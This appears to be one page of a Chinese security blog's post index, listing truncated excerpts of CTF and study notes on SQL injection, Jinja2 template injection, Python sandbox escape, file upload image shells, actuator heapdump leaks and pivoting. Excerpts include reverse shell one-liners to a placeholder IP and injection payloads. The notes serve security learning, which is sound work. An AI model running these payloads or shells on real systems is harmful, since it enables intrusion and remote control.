三十功名尘与土,八千里路云和月
cookie和session的区别 cookie和session的区别
区别 cookie存储在客户端,session存储在服务器。 session比cookie更复杂一些,能存储相对较大的数据量。 session比cookie安全性更高 cookie能跨子域共享,但无法实现完全不同的域名之间的共享。 s
2024-12-22 0x00dream
整数溢出 整数溢出
整数溢出uint8 -> 0-255 uint16 -> 0-65535 uint32 -> 0-4294967295 uint36 -> 0-18446744073709551615 int8 -> -127
2024-12-19 0x00dream
java安全之actuator监控系统漏洞 java安全之actuator监控系统漏洞
漏洞原理actuator是SpringBoot里一个服务器信息的监控系统,会监控服务器缓存、内存、配置信息等的使用情况。 默认端口是8081,可以查看到它的监控各种信息的路径 其中的heapdump这个信息最为重要,访问将其下载下来 然
2024-12-17 0x00dream
python沙箱逃逸 python沙箱逃逸
原理沙箱会禁用一些危险函数,通过花式调用库函数可以逃逸出沙箱的防护,最终达到执行系统命令的目的。 在python中执行系统命令的方式os: os.system os.p commands:仅限2.x subprocess.run ti
2024-12-15 0x00dream
n1book n1book
文件上传知识点:服务器把上传的文件放在随机数路径下的话,使用路径穿越进行绕过 copy 001.jpeg/b + test.php/a 2.jpg # 图片马制作 图片马必须配合文件包含漏洞才能使用 题目源码 <?php h
2024-12-07 0x00dream
签到·好玩的PHP 签到·好玩的PHP
PHP反序列化要点:if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) 两个等于号用类型不同来绕过。 if($a == $b) 或 if($a != $b
2024-11-27 0x00dream
CTFshow_web CTFshow_web
web7:联合查询注入过滤空格(考点:联合查询注入绕过)将空格换为%09或/**/来绕过 获取表名payload id=-1/**/union/**/select/**/1,group_concat(table_name),3/**/fro
2024-11-25 0x00dream
buu_SSTI buu_SSTI
http://d25e1d74-e7dc-41be-9342-20a070f723fe.node5.buuoj.cn:81/?password={{2*3}} 得到 可知,存在jinja2模板注入 1.方法一,手工?password={{
2024-11-23 0x00dream
SSTI模板注入 SSTI模板注入
使用的框架不同,模板引擎的解析符号也不同。 #一、python的SSTI攻击过程(Jinja2) ?name={{''.__class__.__base__.__subclasses__()}} # 查看所有可用类 从上面的可用
2024-11-23 0x00dream
内网穿透 内网穿透
1.msf内网穿透(跨路由)msf拿到跳板机的shell后拿到flag1,便进入到meterpreter后渗透,进行内网信息收集——查看靶机上的内网路由地址,然后将其添加到本地代理中进行内网穿透。 meterpreter> run g
2024-11-21 0x00dream
反弹shell 反弹shell
bash -i sh -i >& /dev/tcp/10.10.10.10/9001 0>&1 nc -e nc 10.10.10.10 9001 -e sh nc.exe -e nc.exe 10.10.1
2024-11-21 0x00dream
sql注入 sql注入
1.类型1.1宽字节注入1.1.1原理首先,一个字节为窄字节,两个字节为宽字节。 由于php开启了magicqoutes魔法函数,会将用户输入的特殊字符(包括单引号,双引号,空格等)前面加一个反斜杠来进行转义, mysql的编码方式为GBK
2024-11-21 0x00dream
3 / 6